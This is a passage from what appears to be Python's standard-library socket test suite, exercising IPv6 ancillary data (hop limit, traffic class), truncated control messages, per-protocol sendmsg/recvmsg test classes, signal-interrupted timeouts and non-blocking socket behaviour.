self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
self.assertIsInstance(ancdata[0], tuple)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimit(self):
# Test receiving the packet hop limit as ancillary data.
self.checkHopLimit(ancbufsize=10240)
@testRecvHopLimit.client_skip
def _testRecvHopLimit(self):
# Need to wait until server has asked to receive ancillary
# data, as implementations are not required to buffer it
# otherwise.
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimitCMSG_SPACE(self):
# Test receiving hop limit, using CMSG_SPACE to calculate buffer size.
self.checkHopLimit(ancbufsize=socket.CMSG_SPACE(SIZEOF_INT))
@testRecvHopLimitCMSG_SPACE.client_skip
def _testRecvHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Could test receiving into buffer sized using CMSG_LEN, but RFC
# 3542 says portable applications must provide space for trailing
# padding. Implementations may set MSG_CTRUNC if there isn't
# enough space for the padding.
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSetHopLimit(self):
# Test setting hop limit on outgoing packet and receiving it
# at the other end.
self.checkHopLimit(ancbufsize=10240, maxhop=self.hop_limit)
@testSetHopLimit.client_skip
def _testSetHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
def checkTrafficClassAndHopLimit(self, ancbufsize, maxhop=255,
ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space. Check that data is MSG, ancillary
# data is not truncated (but ignore any flags in ignoreflags),
# and traffic class and hop limit are in range (hop limit no
# more than maxhop).
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 2)
ancmap = self.ancillaryMapping(ancdata)
tcdata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS)]
self.assertEqual(len(tcdata), SIZEOF_INT)
a = array.array("i")
a.frombytes(tcdata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
hldata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT)]
self.assertEqual(len(hldata), SIZEOF_INT)
a = array.array("i")
a.frombytes(hldata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimit(self):
# Test receiving traffic class and hop limit as ancillary data.
self.checkTrafficClassAndHopLimit(ancbufsize=10240)
@testRecvTrafficClassAndHopLimit.client_skip
def _testRecvTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
# Test receiving traffic class and hop limit, using
# CMSG_SPACE() to calculate buffer size.
self.checkTrafficClassAndHopLimit(
ancbufsize=socket.CMSG_SPACE(SIZEOF_INT) * 2)
@testRecvTrafficClassAndHopLimitCMSG_SPACE.client_skip
def _testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSetTrafficClassAndHopLimit(self):
# Test setting traffic class and hop limit on outgoing packet,
# and receiving them at the other end.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testSetTrafficClassAndHopLimit.client_skip
def _testSetTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testOddCmsgSize(self):
# Try to send ancillary data with first item one byte too
# long. Fall back to sending with correct size if this fails,
# and check that second item was handled correctly.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testOddCmsgSize.client_skip
def _testOddCmsgSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
try:
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class]).tobytes() + b"\x00"),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
except OSError as e:
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
self.assertEqual(nbytes, len(MSG))
# Tests for proper handling of truncated ancillary data
def checkHopLimitTruncatedHeader(self, ancbufsize, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space, which should be too small to contain the ancillary
# data header (if ancbufsize is None, pass no second argument
# to recvmsg()). Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and no ancillary data is
# returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
args = () if ancbufsize is None else (ancbufsize,)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), *args)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no ancillary
# buffer size is provided.
self.checkHopLimitTruncatedHeader(ancbufsize=None,
# BSD seems to set
# MSG_CTRUNC only if an item
# has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
@testCmsgTruncNoBufSize.client_skip
def _testCmsgTruncNoBufSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc0(self):
# Check that no ancillary data is received when ancillary
# buffer size is zero.
self.checkHopLimitTruncatedHeader(ancbufsize=0,
ignoreflags=socket.MSG_CTRUNC)
@testSingleCmsgTrunc0.client_skip
def _testSingleCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=1)
@testSingleCmsgTrunc1.client_skip
def _testSingleCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc2Int(self):
self.checkHopLimitTruncatedHeader(ancbufsize=2 * SIZEOF_INT)
@testSingleCmsgTrunc2Int.client_skip
def _testSingleCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncLen0Minus1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=socket.CMSG_LEN(0) - 1)
@testSingleCmsgTruncLen0Minus1.client_skip
def _testSingleCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncInData(self):
# Test truncation of a control message inside its associated
# data. The message may be returned with its data truncated,
# or not returned at all.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG), socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertLess(len(cmsg_data), SIZEOF_INT)
@testSingleCmsgTruncInData.client_skip
def _testSingleCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
def checkTruncatedSecondHeader(self, ancbufsize, ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space, which should be large enough to
# contain the first item, but too small to contain the header
# of the second. Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and only one ancillary
# data item is returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertIn(cmsg_type, {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT})
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
# Try the above test with various buffer sizes.
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc0(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT),
ignoreflags=socket.MSG_CTRUNC)
@testSecondCmsgTrunc0.client_skip
def _testSecondCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) + 1)
@testSecondCmsgTrunc1.client_skip
def _testSecondCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc2Int(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
2 * SIZEOF_INT)
@testSecondCmsgTrunc2Int.client_skip
def _testSecondCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTruncLen0Minus1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(0) - 1)
@testSecondCmsgTruncLen0Minus1.client_skip
def _testSecondCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecomdCmsgTruncInData(self):
# Test truncation of the second of two control messages inside
# its associated data.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) + socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
cmsg_types = {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT}
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertLess(len(cmsg_data), SIZEOF_INT)
self.assertEqual(ancdata, [])
@testSecomdCmsgTruncInData.client_skip
def _testSecomdCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Derive concrete test classes for different socket types.
class SendrecvmsgUDPTestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
class SendmsgUDPTest(SendmsgConnectionlessTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgUDPTest(RecvmsgTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoUDPTest(RecvmsgIntoTests, SendrecvmsgUDPTestBase):
pass
class SendrecvmsgUDP6TestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDP6TestBase):
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer, ignoring scope ID
self.assertEqual(addr1[:-1], addr2[:-1])
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class SendmsgUDP6Test(SendmsgConnectionlessTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgUDP6Test(RecvmsgTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoUDP6Test(RecvmsgIntoTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgRFC3542AncillaryUDP6Test(RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoRFC3542AncillaryUDP6Test(RecvmsgIntoMixin,
RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
class SendrecvmsgTCPTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, TCPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
class SendmsgTCPTest(SendmsgStreamTests, SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgTCPTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoTCPTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
class SendrecvmsgSCTPStreamTestBase(SendrecvmsgSCTPFlagsBase,
SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, SCTPStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class SendmsgSCTPStreamTest(SendmsgStreamTests, SendrecvmsgSCTPStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgSCTPStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
@requireAttrs(socket.socket, "recvmsg_into")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgIntoSCTPStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgIntoSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
class SendrecvmsgUnixStreamTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, UnixStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "AF_UNIX")
class SendmsgUnixStreamTest(SendmsgStreamTests, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgUnixStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgIntoUnixStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgSCMRightsStreamTest(SCMRightsTest, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg_into")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgIntoSCMRightsStreamTest(RecvmsgIntoMixin, SCMRightsTest,
SendrecvmsgUnixStreamTestBase):
pass
# Test interrupting the interruptible send/receive methods with a
# signal when a timeout is set. These tests avoid having multiple
# threads alive during the test so that the OS cannot deliver the
# signal to the wrong one.
class InterruptedTimeoutBase(unittest.TestCase):
# Base class for interrupted send/receive tests. Installs an
# empty handler for SIGALRM and removes it on teardown, along with
# any scheduled alarms.
def setUp(self):
super().setUp()
orig_alrm_handler = signal.signal(signal.SIGALRM,
lambda signum, frame: 1 / 0)
self.addCleanup(signal.signal, signal.SIGALRM, orig_alrm_handler)
# Timeout for socket operations
timeout = 4.0
# Provide setAlarm() method to schedule delivery of SIGALRM after
# given number of seconds, or cancel it if zero, and an
# appropriate time value to use. Use setitimer() if available.
if hasattr(signal, "setitimer"):
alarm_time = 0.05
def setAlarm(self, seconds):
signal.setitimer(signal.ITIMER_REAL, seconds)
else:
# Old systems may deliver the alarm up to one second early
alarm_time = 2
def setAlarm(self, seconds):
signal.alarm(seconds)
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedRecvTimeoutTest(InterruptedTimeoutBase, UDPTestBase):
# Test interrupting the recv*() methods with signals when a
# timeout is set.
def setUp(self):
super().setUp()
self.serv.settimeout(self.timeout)
def checkInterruptedRecv(self, func, *args, **kwargs):
# Check that func(*args, **kwargs) raises
# errno of EINTR when interrupted by a signal.
try:
self.setAlarm(self.alarm_time)
with self.assertRaises(ZeroDivisionError) as cm:
func(*args, **kwargs)
finally:
self.setAlarm(0)
def testInterruptedRecvTimeout(self):
self.checkInterruptedRecv(self.serv.recv, 1024)
def testInterruptedRecvIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recv_into, bytearray(1024))
def testInterruptedRecvfromTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom, 1024)
def testInterruptedRecvfromIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom_into, bytearray(1024))
@requireAttrs(socket.socket, "recvmsg")
def testInterruptedRecvmsgTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg, 1024)
@requireAttrs(socket.socket, "recvmsg_into")
def testInterruptedRecvmsgIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg_into, [bytearray(1024)])
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedSendTimeoutTest(InterruptedTimeoutBase,
ThreadSafeCleanupTestCase,
SocketListeningTestMixin, TCPTestBase):
# Test interrupting the interruptible send*() methods with signals
# when a timeout is set.
def setUp(self):
super().setUp()
self.serv_conn = self.newSocket()
self.addCleanup(self.serv_conn.close)
# Use a thread to complete the connection, but wait for it to
# terminate before running the test, so that there is only one
# thread to accept the signal.
cli_thread = threading.Thread(target=self.doConnect)
cli_thread.start()
self.cli_conn, addr = self.serv.accept()
self.addCleanup(self.cli_conn.close)
cli_thread.join()
self.serv_conn.settimeout(self.timeout)
def doConnect(self):
self.serv_conn.connect(self.serv_addr)
def checkInterruptedSend(self, func, *args, **kwargs):
# Check that func(*args, **kwargs), run in a loop, raises
# OSError with an errno of EINTR when interrupted by a
# signal.
try:
with self.assertRaises(ZeroDivisionError) as cm:
while True:
self.setAlarm(self.alarm_time)
func(*args, **kwargs)
finally:
self.setAlarm(0)
# Issue #12958: The following tests have problems on OS X prior to 10.7
@support.requires_mac_ver(10, 7)
def testInterruptedSendTimeout(self):
self.checkInterruptedSend(self.serv_conn.send, b"a"*512)
@support.requires_mac_ver(10, 7)
def testInterruptedSendtoTimeout(self):
# Passing an actual address here as Python's wrapper for
# sendto() doesn't allow passing a zero-length one; POSIX
# requires that the address is ignored since the socket is
# connection-mode, however.
self.checkInterruptedSend(self.serv_conn.sendto, b"a"*512,
self.serv_addr)
@support.requires_mac_ver(10, 7)
@requireAttrs(socket.socket, "sendmsg")
def testInterruptedSendmsgTimeout(self):
self.checkInterruptedSend(self.serv_conn.sendmsg, [b"a"*512])
class TCPCloserTest(ThreadedTCPSocketTest):
def testClose(self):
conn, addr = self.serv.accept()
conn.close()
sd = self.cli
read, write, err = select.select([sd], [], [], 1.0)
self.assertEqual(read, [sd])
self.assertEqual(sd.recv(1), b'')
# Calling close() many times should be safe.
conn.close()
conn.close()
def _testClose(self):
self.cli.connect((HOST, self.port))
time.sleep(1.0)
class BasicSocketPairTest(SocketPairTest):
def __init__(self, methodName='runTest'):
SocketPairTest.__init__(self, methodName=methodName)
def _check_defaults(self, sock):
self.assertIsInstance(sock, socket.socket)
if hasattr(socket, 'AF_UNIX'):
self.assertEqual(sock.family, socket.AF_UNIX)
else:
self.assertEqual(sock.family, socket.AF_INET)
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
def _testDefaults(self):
self._check_defaults(self.cli)
def testDefaults(self):
self._check_defaults(self.serv)
def testRecv(self):
msg = self.serv.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.cli.send(MSG)
def testSend(self):
self.serv.send(MSG)
def _testSend(self):
msg = self.cli.recv(1024)
self.assertEqual(msg, MSG)
class NonBlockingTCPTests(ThreadedTCPSocketTest):
def __init__(self, methodName='runTest'):
self.event = threading.Event()
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def testSetBlocking(self):
# Testing whether set blocking works
self.serv.setblocking(True)
self.assertIsNone(self.serv.gettimeout())
self.assertTrue(self.serv.getblocking())
if fcntl:
self.assertTrue(_is_fd_in_blocking_mode(self.serv))
self.serv.setblocking(False)
self.assertEqual(self.serv.gettimeout(), 0.0)
self.assertFalse(self.serv.getblocking())
if fcntl:
self.assertFalse(_is_fd_in_blocking_mode(self.serv))
self.serv.settimeout(None)
self.assertTrue(self.serv.getblocking())
if fcntl:
self.assertTrue(_is_fd_in_blocking_mode(self.serv))
self.serv.settimeout(0)
self.assertFalse(self.serv.getblocking())
self.assertEqual(self.serv.gettimeout(), 0)
if fcntl:
self.assertFalse(_is_fd_in_blocking_mode(self.serv))
self.serv.settimeout(10)
self.assertTrue(self.serv.getblocking())
self.assertEqual(self.serv.gettimeout(), 10)
if fcntl:
# When a Python socket has a non-zero timeout, it's
# switched internally to a non-blocking mode.
# Later, sock.sendall(), sock.recv(), and other socket
# operations use a `select()` call and handle EWOULDBLOCK/EGAIN
# on all socket operations. That's how timeouts are
# enforced.
self.assertFalse(_is_fd_in_blocking_mode(self.serv))
self.serv.settimeout(0)
self.assertFalse(self.serv.getblocking())
if fcntl:
self.assertFalse(_is_fd_in_blocking_mode(self.serv))
start = time.time()
try:
self.serv.accept()
except OSError:
pass
end = time.time()
self.assertTrue((end - start) < 1.0, "Error setting non-blocking mode.")
def _testSetBlocking(self):
pass
@support.cpython_only
def testSetBlocking_overflow(self):
# Issue 15989
import _testcapi
if _testcapi.UINT_MAX >= _testcapi.ULONG_MAX:
self.skipTest('needs UINT_MAX < ULONG_MAX')
self.serv.setblocking(False)
self.assertEqual(self.serv.gettimeout(), 0.0)
self.serv.setblocking(_testcapi.UINT_MAX + 1)
self.assertIsNone(self.serv.gettimeout())
_testSetBlocking_overflow = support.cpython_only(_testSetBlocking)
@unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'),
'test needs socket.SOCK_NONBLOCK')
@support.requires_linux_version(2, 6, 28)
def testInitNonBlocking(self):
# reinit server socket
self.serv.close()
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM |
socket.SOCK_NONBLOCK)
self.assertFalse(self.serv.getblocking())
self.assertEqual(self.serv.gettimeout(), 0)
self.port = support.bind_port(self.serv)
self.serv.listen()
# actual testing
start = time.time()
try:
self.serv.accept()
except OSError:
pass
end = time.time()
self.assertTrue((end - start) < 1.0, "Error creating with non-blocking mode.")
def _testInitNonBlocking(self):
pass
def testInheritFlags(self):
# Issue #7995: when calling accept() on a listening socket with a
# timeout, the resulting socket should not be non-blocking.
self.serv.settimeout(10)
try:
conn, addr = self.serv.accept()
message = conn.recv(len(MSG))
finally:
conn.close()
self.serv.settimeout(None)
def _testInheritFlags(self):
time.sleep(0.1)
self.cli.connect((HOST, self.port))
time.sleep(0.5)
self.cli.send(MSG)
def testAccept(self):
# Testing non-blocking accept
